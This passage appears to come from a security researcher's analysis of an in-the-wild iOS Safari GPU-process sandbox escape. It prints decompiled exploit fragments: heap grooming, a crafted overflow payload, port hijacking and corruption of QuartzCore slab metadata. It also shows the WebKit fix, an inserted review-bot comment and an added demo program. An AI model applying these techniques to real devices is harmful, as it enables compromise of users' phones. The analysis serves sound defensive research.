m(\"0xdddddddddddddddd\"), p.Xt);\n\nxxxx.on(new m(\"0xd1d1d1d1d1d1d1d1\"), p.Jt);\n\nxxxx.on(new m(\"0xd2d2d2d2d2d2d2d2\"), p.Ht);\n\nThe initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. 
It's this inner Mach-O which this analysis will cover.\n\n### Part I - Mysterious Messages\n\nLooking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:\n\n\"AppleM2ScalerCSCDriver\",0\n\n\"IOSurfaceRoot\",0\n\n\"AGXAccelerator\",0 \n\nBut following the cross references to \"AGXAccelerator\" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own): \n\nkern_return_t\n\nget_a_user_client(char *matching_string,\n\nu32 type,\n\nvoid* s_out) {\n\nkern_return_t ret;\n\nstruct uc_reply_msg;\n\nmach_port_name_t reply_port;\n\nstruct msg_1 msg;\n\nreply_port = 0;\n\nmach_port_allocate(mach_task_self_,\n\nMACH_PORT_RIGHT_RECEIVE,\n\n&reply_port);\n\nmemset(&msg, 0, sizeof(msg));\n\nmsg.hdr.msgh_bits = 0x1413;\n\nmsg.hdr.msgh_remote_port = a_global_port;\n\nmsg.hdr.msgh_local_port = reply_port;\n\nmsg.hdr.msgh_id = 5;\n\nmsg.hdr.msgh_size = 200;\n\nmsg.field_a = 0;\n\nmsg.type = type;\n\n__strcpy_chk(msg.matching_str, matching_string, 128LL);\n\nret = mach_msg_send(&msg.hdr);\n\n...\n\n// return a port read from the reply message via s_out\n\nWhilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own [MIG serialization](<https://www.cs.cmu.edu/afs/cs/project/mach/public/doc/unpublished/mig.ps>) code for interacting with IOKit) this isn't a MIG message.\n\nTrying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. 
The question was: what other part?\n\n### Down the rabbit hole\n\nAt this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.\n\nIn particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.\n\nThere is exactly one hit on Google for that constant:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77WGxhsnBXl8ShJPuffTWC4CVnq9-ehI4PbAqe2ZcWzccweFWaBEuxQUb03kryqpgeyfJnlI4Xh494eScUZTM1Yh6Cniss0U9z0Ycws1mfh8p1ML4dSjlMypbnqZyNSjQx654p2oeax6341PjKbN07GO7-b31hU9Lx26PF2U153TFehRyGVF68ohby4I/s1600/image17.png>)\n\nIgnoring Google's helpful advice that maybe I wanted to search for \"cake recipes\" instead of this hex constant and following the single result leads to this snippet on [opensource.apple.com](<https://opensource.apple.com/source/WebKit2/WebKit2-7609.3.5.1.3/Platform/IPC/cocoa/ConnectionCocoa.mm.auto.html>) in ConnectionCocoa.mm:\n\nnamespace IPC {\n\nstatic const size_t inlineMessageMaxSize = 4096;\n\n// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).\n\nconstexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;\n\nconstexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;\n\nThis is a constant used in Safari IPC messages!\n\nWhilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. 
This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.\n\n### The path less trodden\n\nGoogling for info on Safari IPC doesn't yield many results (apart from some very early [Project Zero vulnerability reports](<https://bugs.chromium.org/p/project-zero/issues/detail?id=10&q=&can=1>)) and looking through the WebKit source reveals heavy use of [generated code](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/generate-serializers.py>) and [C++ operator overloading](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/generate-serializers.py#L426>), neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.\n\nBut the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:\n\nvoid Encoder::encodeHeader()\n\n{\n\n*this << defaultMessageFlags;\n\n*this << m_messageName;\n\n*this << m_destinationID;\n\n}\n\nThe flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHyHj04YHCntV4a-CazqQl6hyZ7SK4dKseLE4jowixuOV-a_Deq2tOnpipp3GtmvkPwaih64ZYbjX-V1wcAkHqlIb0WhV0Nb2yMlkHfj2gzkx1vloU85dt2fliFnMuh_v0M_Oup9udzhBM5_bPDsLPLHx749BVcpDHxvN8mNLfD0nRUiHyKDJ7sceVsA/s840/image15.png>)\n\nIt's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. 
The exploit uses the device's [uname](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/uname.3.html>) string, product and OS version to choose the correct hardcoded table of messageName values.\n\nThe IPC::description function in the iOS shared cache maps messageName values to IPC names:\n\nconst char * IPC::description(unsigned int messageName)\n\n{\n\nif ( messageName > 0xC78 )\n\nreturn \"<invalid message name>\";\n\nelse\n\nreturn off_1D61ED988[messageName];\n\n}\n\nThe size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.\n\nUsing the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:\n\n0x39: GPUConnectionToWebProcess_CreateRemoteGPU\n\n0x3a: GPUConnectionToWebProcess_CreateRenderingBackend\n\n0x9B5: InitializeConnection\n\n0x9B7: ProcessOutOfStreamMessage\n\n0xBA2: RemoteAdapter_RequestDevice\n\n0xBA5: RemoteBuffer_MapAsync\n\n0x271: RemoteBuffer_Unmap\n\n0xBA6: RemoteCDMFactoryProxy_CreateCDM\n\n0x2A2: RemoteDevice_CreateBuffer\n\n0x2C7: RemoteDisplayListRecorder_DrawNativeImage\n\n0x2D4: RemoteDisplayListRecorder_FillRect\n\n0x2DF: RemoteDisplayListRecorder_SetCTM\n\n0x2F3: RemoteGPUProxy_WasCreated\n\n0xBAD: RemoteGPU_RequestAdapter\n\n0x402: RemoteMediaRecorderManager_CreateRecorder\n\n0xA85: RemoteMediaRecorderManager_CreateRecorderReply\n\n0x412: RemoteMediaResourceManager_RedirectReceived\n\n0x469: RemoteRenderingBackendProxy_DidInitialize\n\n0x46D: RemoteRenderingBackend_CacheNativeImage\n\n0x46E: RemoteRenderingBackend_CreateImageBuffer\n\n0x474: RemoteRenderingBackend_ReleaseResource\n\n0x9B8: SetStreamDestinationID\n\n0x9B9: SyncMessageReply\n\n0x9BA: Terminate\n\nThis list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.\n\n### Finding a way\n\nThe destination port 
which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:\n\n__data:000000003E4841C0 dst_port DCQ 0x4444444444444444\n\nI mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:\n\nlet Ls = o(p.Ee);\n\nlet Ds = o(Ls.add(p.qe));\n\nlet Ws = o(Ds.add(p.$e));\n\nlet vs = o(Ws.add(p.Ze));\n\njBHk.on(new m(\"0x4444444444444444\"), vs);\n\nReplacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:\n\nlet Ls = o(0x1dd453458);\n\nlet Ds = o(Ls.add(256));\n\nlet Ws = o(Ds.add(24);\n\nlet vs = o(Ws.add(280));\n\nAt the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:\n\nWebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process\n\nFollowing the offsets we can see they follow this pointer chain to be able to find the mach port right representing the WebProcess's connection to the GPU process:\n\nprocess->m_gpuProcessConnection->m_connection->m_sendPort\n\nThe exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.\n\n### Defining features\n\nWebkit defines its IPC messages using a simple custom [DSL](<https://en.wikipedia.org/wiki/Domain-specific_language>) in files ending with the suffix .messages.in. 
These definitions [look like this](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/GPUProcess/graphics/WebGPU/RemoteRenderPipeline.messages.in>):

```
messages -> RemoteRenderPipeline NotRefCounted Stream {
    void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);
    void SetLabel(String label)
}
```

These are parsed by [this python script](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/webkit/parser.py>) to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

```cpp
void encode(IPC::Encoder&) const;
static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);
```

There are a number of macros defining these coders for the built-in types.

### A pattern appears

Renaming the methods in the exploit which send IPC messages and reversing some more of their arguments, a clear pattern emerges:

```c
image_buffer_base_id = rand();
for (i = 0; i < 34; i++) {
    IPC_RemoteRenderingBackend_CreateImageBuffer(image_buffer_base_id + i);
}
semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 2);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);
usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 4);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);
usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 6);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);
usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 8);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);
usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 10);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);
usleep(4000u);

IPC_RemoteRenderingBackend_ReleaseResource(image_buffer_base_id + 12);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);
usleep(4000u);

semaphore_signal(semaphore_b);
```

This creates 34 RemoteRenderingBackend ImageBuffer objects, then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k).

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMvJqqmG2DCLJpYJNfKRae4HmTO7gzV50CfUhun8NsLoIDZyaQiinJZWqaqsSLXmWEbh3ZR0un4E5dHo28oA0Ty2yuV9itnV4YScCgS8hmqlYx6XHX8orrZf9dtvSw5DxDB-g0fDxJHClZRkP8-CXxi_7ShGdClRlocHGX_mb6Tk9LPJdeyCBA8ktEjBA/s342/image18.png>)

This looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.

### A strange argument

I started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:

```
RemoteBuffer::MapAsync
RemoteBuffer::Unmap
```

These are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the [WebGPU](<https://en.wikipedia.org/wiki/WebGPU>) implementation.

Whilst the IPC machinery implementing WebGPU exists in Safari, the user-facing JavaScript API isn't present.
It used to be available in [Safari Technology Preview](<https://developer.apple.com/safari/technology-preview/>) builds available from Apple but it hasn't been enabled there for some time. The W3C WebGPU group's GitHub wiki suggests that when enabling WebGPU support in Safari users should "[avoid leaving it enabled when browsing the untrusted web](<https://github.com/gpuweb/gpuweb/wiki/Implementation-Status#safari-in-progress>)."

The IPC definitions for the RemoteBuffer look like this:

```
messages -> RemoteBuffer NotRefCounted Stream
{
    void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,
                  PAL::WebGPU::Size64 offset,
                  std::optional<PAL::WebGPU::Size64> size)
        -> (std::optional<Vector<uint8_t>> data) Synchronous
    void Unmap(Vector<uint8_t> data)
}
```

These [WebGPU](<https://gpuweb.github.io/gpuweb/explainer/>) [resources](<https://github.com/gpuweb/gpuweb/issues/138>) explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:

MapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.

Unmap then signals that the CPU is done with the buffer and ownership can return to the GPU.

In practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector<uint8_t>. Unmap then passes the new contents back to the GPU, also as a Vector<uint8_t>.

You might be able to see where this is going...

### Buffer lifecycles

RemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:

```
messages -> RemoteDevice NotRefCounted Stream {
    void Destroy()
    void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,
                      WebKit::WebGPUIdentifier identifier)
```

This takes a description of the buffer to create and an identifier to name it.
All the calls to this IPC in the exploit used a fixed size of 0x4000, which is 16KB, the size of a single physical page on iOS.

The first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:

```c
IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,
                          0x4000,
                          0);
```

As shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end) of size 0 (i.e. nothing).

Directly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the "new content":

```c
b[0] = 0x7F6F3229LL;
b[1] = 0LL;
b[2] = 0LL;
b[3] = 0xFFFFLL;
b[4] = arg_val;
return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
```

### Buffer origins

I spent a considerable time trying to figure out the origin of the underlying pages backing the RemoteBuffer buffer allocations. Statically following the code from WebKit you eventually end up in the userspace side of the AGX GPU family drivers, which are written in Objective-C.
There are plenty of methods with names like

```
id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]
```

implying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.

Using dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 MacBook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:

```
IOMemoryDescriptor::createMappingInTask
IOBufferMemoryDescriptor::initWithPhysicalMask
com.apple.AGXG13X`AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions
com.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions
com.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions
com.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource
com.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource
kernel.release.t6000`0xfffffe00263116cc+0x80
kernel.release.t6000`0xfffffe00263117bc+0x28c
kernel.release.t6000`0xfffffe0025d326d0+0x184
kernel.release.t6000`0xfffffe0025c3856c+0x384
kernel.release.t6000`0xfffffe0025c0e274+0x2c0
kernel.release.t6000`0xfffffe0025c25a64+0x1a4
kernel.release.t6000`0xfffffe0025c25e80+0x200
kernel.release.t6000`0xfffffe0025d584a0+0x184
kernel.release.t6000`0xfffffe0025d62e08+0x5b8
kernel.release.t6000`0xfffffe0025be37d0+0x28
^
--- kernel stack | | userspace stack ---
v
libsystem_kernel.dylib`mach_msg2_trap
IOKit`io_connect_method
IOKit`IOConnectCallMethod
IOGPU`IOGPUResourceCreate
IOGPU`-[IOGPUMetalResource initWithDevice:remoteStorageResource:options:args:argsSize:]
IOGPU`-[IOGPUMetalBuffer initWithDevice:pointer:length:alignment:options:sysMemSize:gpuAddress:args:argsSize:deallocator:]
AGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:length:alignment:options:isSuballocDisabled:resourceInArgs:pinnedGPULocation:]
AGXMetalG13X`-[AGXBuffer initWithDevice:length:alignment:options:isSuballocDisabled:pinnedGPULocation:]
AGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]
IOGPU`IOGPUMetalSuballocatorAllocate
```

The algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the "heap groom" seen earlier is so simple, as vm_allocate uses a simple bottom-up first-fit algorithm.

### mapAsync

With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:

```cpp
void* Buffer::getMappedRange(size_t offset, size_t size)
{
    // https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange
    auto rangeSize = size;
    if (size == WGPU_WHOLE_MAP_SIZE)
        rangeSize = computeRangeSize(m_size, offset);

    if (!validateGetMappedRange(offset, rangeSize)) {
        // FIXME: "throw an OperationError and stop."
        return nullptr;
    }

    m_mappedRanges.add({ offset, offset + rangeSize });
    m_mappedRanges.compact();

    return static_cast<char*>(m_buffer.contents) + offset;
}
```

m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length are stored into the m_mappedRange field.
The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.

### unmap

Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.

```cpp
void RemoteBuffer::unmap(Vector<uint8_t>&& data)
{
    if (!m_mappedRange)
        return;
    ASSERT(m_isMapped);

    if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))
        memcpy(m_mappedRange->source, data.data(), data.size());

    m_isMapped = false;
    m_mappedRange = std::nullopt;
    m_mapModeFlags = { };
}
```

The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents" actually matches the size of the previously mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.

This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.

[Here's the fix](<https://github.com/WebKit/WebKit/commit/54408f5746f2401721bd56d71de132a22b6f9856>):

```diff
void RemoteBuffer::unmap(Vector<uint8_t>&& data)
{
- if (!m_mappedRange)
+ if (!m_mappedRange || m_mappedRange->byteLength < data.size())
return;
ASSERT(m_isMapped);
```

It should be noted that [security issues with WebGPU are well-known](<https://chromium.googlesource.com/chromium/src/+/main/docs/security/research/graphics/webgpu_technical_report.md>) and the JavaScript interface to WebGPU is disabled in Safari on iOS. But the IPCs which support that JavaScript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface.
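Review bot: the new condition returns silently when data.size() exceeds m_mappedRange->byteLength, so the early return also skips the `m_isMapped = false;` and `m_mappedRange = std::nullopt;` resets at the end of the function and leaves the buffer in its mapped state. A Vector larger than the range the same client just mapped can only come from a malformed or hostile WebContent message, so consider treating the mismatch as a protocol violation from the sender rather than ignoring it, and add a comment stating why the length check is required so the guard is not removed in a later refactor.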
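To make the unmap bug and its fix concrete, here is an added illustration (not WebKit's own code) that models a RemoteBuffer with a 16 KB backing buffer, replays the zero-byte mapping at offset 0x4000 described under "A strange argument" followed by a 40-byte Unmap, and shows the unchecked memcpy clobbering memory past the buffer while the fixed check rejects the same request. The names ModelRemoteBuffer, unmapUnchecked, unmapChecked and runDemo, and the canary region that makes the overwrite observable, are constructed for this example.

```cpp
// Added illustration, not WebKit code: a model of the RemoteBuffer MapAsync/Unmap
// lifecycle with the pre-fix (unchecked) and post-fix (checked) unmap side by side.
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <optional>
#include <vector>
// Hypothetical names modelled on the WebKit types quoted on the page.
struct MappedRange {
    uint8_t* source;    // m_buffer.contents + offset, as returned by getMappedRange
    size_t byteLength;  // size of the range the client mapped
};

constexpr size_t kGuardBytes = 0x1000;  // canary region after the buffer (model only)
constexpr uint8_t kCanary = 0xA5;

class ModelRemoteBuffer {
public:
    // The backing "pages" are a byte vector followed by a canary region so a
    // write past the buffer is detected instead of being undefined behaviour.
    explicit ModelRemoteBuffer(size_t size)
        : m_size(size), m_storage(size + kGuardBytes, 0) {
        std::fill(m_storage.begin() + m_size, m_storage.end(), kCanary);
    }

    // Mirrors the validation in Buffer::getMappedRange: the range must lie inside
    // the buffer. offset == m_size with size == 0 passes, which is the (0x4000, 0)
    // request the exploit uses to obtain a pointer to the very end of the pages.
    bool mapAsync(size_t offset, size_t size) {
        if (offset > m_size || size > m_size - offset)
            return false;
        m_mappedRange = MappedRange{ m_storage.data() + offset, size };
        return true;
    }

    // Pre-fix RemoteBuffer::unmap: copies data.size() bytes with no check that the
    // client-supplied Vector fits the range that was actually mapped.
    void unmapUnchecked(const std::vector<uint8_t>& data) {
        if (!m_mappedRange)
            return;
        if (!data.empty())
            std::memcpy(m_mappedRange->source, data.data(), data.size());
        m_mappedRange.reset();
    }

    // Post-fix RemoteBuffer::unmap: the condition added by the WebKit fix rejects
    // a Vector larger than the mapped range before anything is copied.
    bool unmapChecked(const std::vector<uint8_t>& data) {
        if (!m_mappedRange || m_mappedRange->byteLength < data.size())
            return false;
        if (!data.empty())
            std::memcpy(m_mappedRange->source, data.data(), data.size());
        m_mappedRange.reset();
        return true;
    }

    // True if nothing past the end of the buffer has been overwritten.
    bool guardIntact() const {
        return std::all_of(m_storage.begin() + m_size, m_storage.end(),
                           [](uint8_t b) { return b == kCanary; });
    }

    uint8_t byteAt(size_t i) const { return m_storage.at(i); }
    bool isMapped() const { return m_mappedRange.has_value(); }

private:
    size_t m_size;
    std::vector<uint8_t> m_storage;
    std::optional<MappedRange> m_mappedRange;
};

struct DemoResult {
    bool uncheckedOverflowed;  // pre-fix unmap wrote past the buffer
    bool checkedRejected;      // post-fix unmap refused the same request
    bool checkedGuardIntact;   // and left the memory after the buffer untouched
};

// Replays the request shape seen in the exploit (map 0 bytes at offset 0x4000 of
// a 16 KB buffer, then unmap 40 bytes) against both versions; the payload is
// constructed filler and carries no meaningful content.
DemoResult runDemo() {
    const size_t bufferSize = 0x4000;
    const std::vector<uint8_t> payload(40, 0x41);
    ModelRemoteBuffer unchecked(bufferSize);
    unchecked.mapAsync(bufferSize, 0);
    unchecked.unmapUnchecked(payload);
    ModelRemoteBuffer checked(bufferSize);
    checked.mapAsync(bufferSize, 0);
    const bool rejected = !checked.unmapChecked(payload);
    return { !unchecked.guardIntact(), rejected, checked.guardIntact() };
}

int main() {
    DemoResult r = runDemo();
    std::printf("unchecked unmap overflowed: %s\n", r.uncheckedOverflowed ? "yes" : "no");
    std::printf("checked unmap rejected: %s\n", r.checkedRejected ? "yes" : "no");
    return 0;
}
```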
This seems like a significant oversight.

### Destination unknown?

Finding the allocation site for the GPU buffer wasn't trivial; the allocation site for the buffer was hard to determine statically, which made it hard to get a picture of what objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.

Statically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC, which, based on the high-level flow of the exploit, appeared like it must be responsible for allocating the overflow target, again quickly ended up in system library code with no obvious targets.

Working with the theory that, because of the simplicity of the heap groom, it was likely that vm_allocate/mmap was somehow responsible for the allocations, I set breakpoints on those APIs on an M1 Mac in the Safari GPU process and ran the WebGL conformance tests. There was only a single place where mmap was called:

```
Target 0: (com.apple.WebKit.GPU) stopped.
(lldb) bt
* thread #30, name = 'RemoteRenderingBackend work queue',
  stop reason = breakpoint 12.1
  * frame #0: mmap
    frame #1: QuartzCore`CA::CG::Queue::allocate_slab
    frame #2: QuartzCore`CA::CG::Queue::alloc
    frame #3: QuartzCore`CA::CG::ContextDelegate::fill_rects
    frame #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_
    frame #5: CoreGraphics`CGContextFillRects
    frame #6: CoreGraphics`CGContextFillRect
    frame #7: CoreGraphics`CGContextClearRect
    frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create
    frame #9: WebKit::RemoteRenderingBackend::createImageBuffer
```

This corresponds perfectly with the IPC we see called in the heap groom above!

### To the core...

QuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site, it seems to be a custom queue type used for drawing commands.
Dumping the mmap'ed QueueSlab memory a little later on we see some structure:

```
(lldb) x/10xg $x0
0x13574c000: 0x00000001420041d0 0x0000000000000000
0x13574c010: 0x0000000000004000 0x0000000000003f10
0x13574c020: 0x000000013574c0f0 0x0000000000000000
```

Reversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:

```c
struct QuartzQueueSlab
{
    struct QuartzQueueSlab *free_list_ptr;
    uint64_t size_a;
    uint64_t mmap_size;
    uint64_t remaining_size;
    uint64_t buffer_ptr;
    uint64_t f;
    uint8_t inline_buffer[16336];
};
```

It's a short header with a free-list pointer, some sizes, then a pointer into an inline buffer. The fields are initialized like this:

```c
mapped_base->free_list_ptr = 0;
mapped_base->size_a = 0;
mapped_base->mmap_size = mmap_size;
mapped_base->remaining_size = mmap_size - 0x30;
mapped_base->buffer_ptr = mapped_base->inline_buffer;
```

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqwtuc-0ZTnOb6WGHuqEg5P-gZ3Bf1fqfku2h66HxqhyphenhyphenJmhWFCFMwUTu2ohIfkpvNaj1ocPCESnt_HTMgMaxLzZbLey_tsxIrL8nRJrIa3EGvvOd85kwTppcuFay53pvegAUQ9InLI4D-QHKr9iazM-9MZMdz5gcS7_-AYjnX6bL5wWAzZoS6QnvipnI/s402/image4.png>)

The QueueSlab is a simple allocator.
The buffer pointer (called end in the decompiled CA::CG::Queue::alloc shown later) starts off pointing to the start of the inline buffer, getting bumped up on each allocation as long as remaining_size indicates there's still space available:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov058qoKcaKJw4Uoeq3WxRsoHyKokXVcHkKGabincvB7SKbtRgEJUKcF_jRyORK3M6aKH4EHHOnnTLVo4SS9VKvRIct1t5ZzVBp2D6Pvtz6LrBmFic5aQmKW0XTylkd9k_M7RqzIAXEN146E2taGVgf00lTbcK-iez0LB6_Sma02AhnVSpN3ORaP3ZU0/s401/image1.png>)

Assuming that this very likely is the corruption target, the bytes with which the call to RemoteBuffer::Unmap would corrupt this header line up like this:

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg36uw0ZWS_Oufz6ILmIJGcbvm_gWPLVB7RDlaMLKAk0BDUDBAaka1uNs-cnhLBErOguET_SAsBprti8NkDcwvx42X6ujBuyegyMd9y3oezr7U1S5e2YZyXfCOPd0zbGjlt1EfJvV7etxNLb25g357NdxWWPJ7Aay6XPm39JiT9HdXieHUVVs3eZ8u44yk/s506/image13.png>)

```c
b[0] = 0x7F6F3229LL;
b[1] = 0LL;
b[2] = 0LL;
b[3] = 0xFFFFLL;
b[4] = arg;
return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
```

The exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which would line up perfectly with the inline-buffer pointer of the QueueSlab, replacing it with an arbitrary value.

The queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.

### Groom 2

Before triggering the Unmap overflow there's another groom:

```c
remote_device_after_base_id = rand();
for (j = 0; j < 200; j++) {
    IPC_RemoteDevice_CreateBuffer_16k(remote_device_after_base_id + j);
}
semaphore_signal(semaphore_b);
semaphore_signal(semaphore_a);

IPC_RemoteRenderingBackend_CacheNativeImage(image_buffer_base_id + 34LL);

semaphore_signal(semaphore_b);
semaphore_signal(semaphore_a);
for (k = 0; k < 200; k++) {
    IPC_RemoteDevice_CreateBuffer_16k(remote_device_after_base_id + 200 + k);
}
```

This is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer, which is the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.

### Overflow 1

The core primitive for the first overflow involves 4 IPC methods:

 1. RemoteBuffer::MapAsync - sets up the destination pointer for the overflow
 2. RemoteBuffer::Unmap - performs the overflow, corrupting queue metadata
 3. RemoteDisplayListRecorder::DrawNativeImage - uses the corrupted queue metadata to write a pointer to a controlled address
 4. RemoteCDMFactoryProxy::CreateCDM - discloses the written pointer value

We'll look at each of those in turn:

### IPC 1 - MapAsync

```c
for (m = 0; m < 6; m++) {
    index_of_corruptor = m;
    IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,
                              0x4000LL,
                              0LL);
```

[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHqd83zzk0t69Zv406G_p93zAOAmrUtAz6-g6wnQfT1rQ_eViIYveasECdYVTO1MrK_wHcGaiYltNbX7Htfc9TJpsa45Q5y2mXse_cse34fl4fQJdbopVhLSwKE_XlPDWa2FfsVhPr5VTkrnwV2uBOvZ_YyfDmRiz8mb13ejtW-mHQcmkcSrwwkvZwY8/s581/image14.png>)

